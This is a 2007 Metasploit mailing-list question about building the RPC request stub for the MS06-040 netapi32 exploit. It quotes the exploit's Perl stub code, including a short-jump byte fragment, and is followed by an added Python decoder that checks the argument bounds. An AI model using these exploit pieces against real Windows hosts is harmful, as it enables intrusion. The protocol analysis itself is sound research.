[framework] Help Understanding Stub for MS06-040

Kyle Schatzle kyle.schatzle at gmail.com
Wed Mar 14 08:38:38 CDT 2007


Hello,

I'm researching RPC vulnerabilities and trying to recreate Metasploit's
MS06-040 exploit as a proof of concept for myself. I understand most of
the code, but am missing the main part, creating the stub. Could you point
me in the right direction to understand how to build this? (Minus the
payload; I can understand (most of) the payload.) I thought I could
disassemble netapi32.dll and recreate the IDL file, but was unsuccessful
using mIDA and unmidl.

Does this function relate to the stub below?

    #  /* Function 0x1f at 0x767e912c */
    #  long function_1f (
    #    [in] [unique] [string] wchar_t * arg_00,
    #    [in] [string] wchar_t * arg_01,
    #    [out] [size_is(arg_03)] char * arg_02,
    #    [in] [range(0, 64000)] long arg_03,
    #    [in] [string] wchar_t * arg_04,
    #    [in,out] long * arg_05,
    #    [in] long arg_06
    #  );
    #

If it doesn't relate, could you point me in the right direction to
understand its format?

        $stub =
            Pex::NDR::Long(int(rand(0xffffffff))).
            Pex::NDR::UnicodeConformantVaryingString('').
            Pex::NDR::UnicodeConformantVaryingStringPreBuilt($path).
            Pex::NDR::Long(int(rand(250)+1)).
            Pex::NDR::UnicodeConformantVaryingStringPreBuilt("\xeb\x02" . "\x00\x00").
            Pex::NDR::Long(int(rand(250)+1)).
            Pex::NDR::Long(0);

Thanks
KyleS
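To show how the NDR primitives in that stub line up with the [in] parameters of the function_1f signature, here is an added example (not Metasploit's Pex::NDR code and not part of the original post): minimal encoders for an NDR long and a Unicode conformant varying string, plus a decoder that walks a request stub in IDL argument order and checks the [range(0, 64000)] bound on arg_03, as a forensics or IDS parser would. The 4-byte padding behaviour of Pex::NDR and the mapping of each stub field to an arg_NN (the leading long being the referent id of the [unique] arg_00 pointer) are this example's assumptions; the sample stub is constructed.

```python
import struct

# NDR primitive encoders (standard NDR layout; Pex::NDR's exact padding is assumed).
def ndr_long(value):
    return struct.pack("<I", value & 0xFFFFFFFF)

def ndr_ucvs(text):
    """Unicode conformant varying string: max count, offset, actual count
    (all in wide chars, NUL included), UTF-16LE data, then 4-byte alignment."""
    data = (text + "\x00").encode("utf-16-le")
    count = len(data) // 2
    out = struct.pack("<III", count, 0, count) + data
    return out + b"\x00" * (-len(out) % 4)

def _read_long(buf, pos):
    return struct.unpack_from("<I", buf, pos)[0], pos + 4

def _read_ucvs(buf, pos):
    max_count, offset, actual = struct.unpack_from("<III", buf, pos)
    pos += 12
    if offset != 0 or actual > max_count or pos + 2 * actual > len(buf):
        raise ValueError("malformed conformant varying string header")
    raw = buf[pos:pos + 2 * actual]
    pos += 2 * actual
    pos += -pos % 4  # skip alignment padding before the next element
    return raw.decode("utf-16-le").rstrip("\x00"), pos

# Decoder: walk the stub in the order the IDL lists the [in] arguments.
# arg_02 is [out] only, so it does not appear in the request stub.
def decode_function_1f_stub(stub):
    fields, pos = {}, 0
    fields["arg_00_referent"], pos = _read_long(stub, pos)  # [unique] pointer id
    fields["arg_00"], pos = _read_ucvs(stub, pos)
    fields["arg_01"], pos = _read_ucvs(stub, pos)
    fields["arg_03"], pos = _read_long(stub, pos)           # size_is for arg_02
    fields["arg_04"], pos = _read_ucvs(stub, pos)
    fields["arg_05"], pos = _read_long(stub, pos)           # [in,out] long
    fields["arg_06"], pos = _read_long(stub, pos)
    if pos != len(stub):
        raise ValueError("trailing bytes after the last argument")
    if fields["arg_03"] > 64000:
        raise ValueError("arg_03 outside IDL range(0, 64000)")
    return fields

# Constructed sample stub with benign values (no exploit content).
SAMPLE_STUB = (ndr_long(0x00020000) + ndr_ucvs("") + ndr_ucvs("\\\\server\\share\\dir")
               + ndr_long(64) + ndr_ucvs("prefix") + ndr_long(1) + ndr_long(0))
```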